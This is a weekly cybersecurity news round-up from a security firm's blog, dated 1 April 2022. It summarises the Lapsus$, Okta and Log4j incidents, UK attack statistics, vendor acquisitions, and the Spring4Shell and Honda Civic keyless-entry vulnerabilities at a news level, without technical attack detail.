Cyber Round-up for 1st April
Welcome to Ironshare’s Cyber Round-up, where we look back at the events of that last week and year to cover some of the news, posts, views, and highlights from the world of Security.
In this week’s round-up:
The Lapsus$ data extortion group announced this week that they were “officially back from a vacation” and didn’t waste any time in posting 70GB of data stolen from the software development firm, Globant. Among the exfiltrated data was images of customer admin credentials, as well as Globant’s source code. Last week during the group’s “vacation”, City of London police arrested seven individuals believed to be associated with Lapsus$; we expect there to be a lot more activity in the coming weeks and we will continue to update you when we learn more.
It has been 4 months since the Log4j vulnerabilities were disclosed, but this does not mean that attacks have slowed down. VMware Horizon servers have been a massive target for attackers looking to exploit Log4j, with researchers believing that “the current wave of attacks against VMware Horizon are a precursor to ransomware attacks”. An updated version of VMware Horizon server was released back in December 2021, which protects against the vulnerabilities being exploited here; those currently using unpatched servers are advised to upgrade to the latest version as soon as possible.
In last week’s blog we reported on the disclosure of a cyber-attack on Okta. Aside from knowing the incident happened two months before the public disclosure of the breach, most information was withheld. A report released on the 22nd march by Sitel, which supplied Okta with contract workers for its customer support, discovered that a support engineer’s laptop had been compromised by a Lapsus$ member. This access was used to steal Okta’s customer data. Okta has noted that the service engineers are only allocated access to data specific to their job role, they are unable to create or delete users, download customer databases or access our source code repositories. Okta also mentioned that they have since found that up to 366 of its clients were affected by the breach in some capacity and they will continue to strengthen its security.
Data collected by the Department of Digital, Culture, Media & Sport (DCMS) has reported almost a third of businesses in the UK are receiving cyber attacks on a weekly basis. With this newfound information, the NCSC is encouraging organisations to improve their security; this includes incorporating the cyber essentials scheme for SMBs and the board toolkit for larger organisations. Along with the rise of cyber attacks on UK organisations, 82% of UK senior managers see cyber security as “fairly high” or higher for business priorities, an increase of 5% since last year.
An Alert sent out from the UK Government has warned to avoid and replace Russian owned products and services. With the UK backing Ukraine in its defence against Russia, it wouldn’t be unrealistic to expect that Russia could leverage is services and products to retaliate against the UK. Products like Kaspersky AV and other cloud enabled products where the supply chain includes Russia have been under scrutiny, as Russian companies have a legal obligation to assist the Russian Federal Security Service. This could compromise the data confidentiality, integrity and availability of UK businesses using Russian products.
Both Microsoft and Google have announced they are acquiring companies to increase cloud security for its users. Currently, Google is in the process of acquiring Mandiant, a cyber security company offering threat intelligence services and more than 600 consultants reporting on thousands of security breaches every year. Research generated from its intelligence analysts feed into Mandiant to help organisations better defend against new threats. Microsoft has recently acquired two cyber security companies, CloudKnox Security, a provider of cloud infrastructure entitlement management, and RiskIQ, a threat intelligence and attack surface management service. These acquisitions aim to increase the security of cloud services that both Google and Microsoft Provide.
Vulnerabilities & Updates
A new zero-day vulnerability has been discovered in the Spring Core Java framework and could allow remote attackers to execute arbitrary code on applications. The zero-day, named ‘Spring4Shell’, is supposedly caused by “unsafe deserialization of passed arguments.” and requires rather specific configuration to be exploited.
More details on this vulnerability can be found here, along with details on the configuration requirements for the exploit.
A Proof-of-concept was recently released for a vulnerability affecting the Remote Keyless System in Honda Civics. This flaw only affects Civics made between 2016 and 2020, and could allow an attacker to lock, unlock and start the vehicles. Despite this proof-of-concept being released, Honda have announced they have no intention of updating the older vehicles affected by this.
A detailed breakdown of this vulnerability can be found here on GitHub.
And that’s it for this week’s round-up, please do check in next week for our new batch of security news and posts.
Stay Safe, Secure and Healthy!
Edition #184 – 1st April 2022
Why not follow us on social media:
Ironshare – Security Simplified